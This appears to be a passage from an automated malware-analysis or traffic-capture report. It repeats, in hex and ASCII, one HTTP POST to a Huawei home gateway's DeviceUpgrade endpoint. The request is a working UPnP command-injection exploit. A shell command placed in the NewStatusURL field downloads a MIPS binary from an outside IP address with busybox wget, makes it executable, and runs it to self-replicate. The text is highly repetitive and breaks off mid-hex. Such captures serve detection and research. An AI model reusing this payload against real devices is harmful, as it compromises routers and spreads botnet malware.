3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 